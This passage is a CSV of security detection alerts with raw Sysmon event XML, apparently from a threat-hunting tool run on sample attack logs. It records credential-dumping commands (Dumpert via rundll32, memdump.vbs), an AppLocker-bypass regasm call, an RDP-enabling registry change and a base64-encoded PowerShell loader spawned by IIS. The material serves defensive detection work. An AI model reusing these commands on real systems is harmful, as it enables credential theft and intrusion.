<Data Name=""FileVersion"">6.3.9600.17415 (winblue_r4.141028-1500)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump</Data>
<Data Name=""CurrentDirectory"">C:\Users\administrator\Desktop\x64\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">ECAD0485-87E3-5D0C-0000-0020266A0F00</Data>
<Data Name=""LogonId"">0xf6a26</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C</Data>
<Data Name=""ParentProcessGuid"">ECAD0485-8897-5D0C-0000-0010A2FA1C00</Data>
<Data Name=""ParentProcessId"">3964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1567169648.171875,2019-08-30T16:54:08.171875+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript c:\ProgramData\memdump.vbs notepad.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\System32\cmd.exe) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:07.873789Z"">
</TimeCreated>
<EventRecordID>32151</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:07.823</Data>
<Data Name=""ProcessGuid"">747F3D96-1C6F-5D69-0000-0010323C1F00</Data>
<Data Name=""ProcessId"">2576</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript c:\ProgramData\memdump.vbs notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1B6C-5D69-0000-00106F060F00</Data>
<Data Name=""ParentProcessId"">2128</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436014.411034,2019-07-30T01:33:34.411034+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:34.295068Z"">
</TimeCreated>
<EventRecordID>4922</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:34.216</Data>
<Data Name=""ProcessGuid"">747F3D96-662E-5D3F-0000-001011038900</Data>
<Data Name=""ProcessId"">6020</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556380674.165738,2019-04-27T19:57:54.165738+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c del /q &quot;C:\Users\IEUser\Downloads\Flash_update.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-27T15:57:54.134488Z"">
</TimeCreated>
<EventRecordID>6622</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1912"" ThreadID=""996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1059,technique_name=Command-Line Interface</Data>
<Data Name=""UtcTime"">2019-04-27 15:57:54.087</Data>
<Data Name=""ProcessGuid"">365ABB72-7C02-5CC4-0000-0010FD6E0C00</Data>
<Data Name=""ProcessId"">3188</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c del /q &quot;C:\Users\IEUser\Downloads\Flash_update.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-7AB1-5CC4-0000-0020BEF40000</Data>
<Data Name=""LogonId"">0xf4be</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-7C01-5CC4-0000-00102B3E0C00</Data>
<Data Name=""ParentProcessId"">2680</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Downloads\Flash_update.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Downloads\Flash_update.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,1552853889.282593,2019-03-18T00:18:09.282593+04:00,,Threat,High,[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,13,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>13</EventID>
<Version>2</Version>
<Level>4</Level>
<Task>13</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:18:09.282593Z"">
</TimeCreated>
<EventRecordID>5267</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""EventType"">SetValue</Data>
<Data Name=""UtcTime"">2019-03-17 20:18:09.272</Data>
<Data Name=""ProcessGuid"">365ABB72-AB70-5C8E-0000-0010DF1F0A00</Data>
<Data Name=""ProcessId"">3700</Data>
<Data Name=""Image"">C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe</Data>
<Data Name=""TargetObject"">HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections</Data>
<Data Name=""Details"">DWORD (0x00000000)</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,"Found User (IIS APPPOOL\DefaultAppPool) run Suspicious PowerShell commands that include ( -enc , -noni ,-noni,-nop,powershell,\Windows\System32,ls, -t , -w ) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7A
CAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==) and Parent Image :C:\Windows\System32\inetsrv\w3wp.exe , Parent CommandLine (c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20) in directory : ( C:\Windows\Temp\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:28:42.711005Z"">
</TimeCreated>
<EventRecordID>5875</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:28:42.700</Data>
<Data Name=""ProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ProcessId"">2584</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0
AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3251-5CEB-0000-00109E06E100</Data>
<Data Name=""ParentProcessId"">748</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:13.650211Z"">
</TimeCreated>
<EventRecordID>20</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:13.560</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Hid User Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Detect IIS/Exchange Exploitation,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) and commandline ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB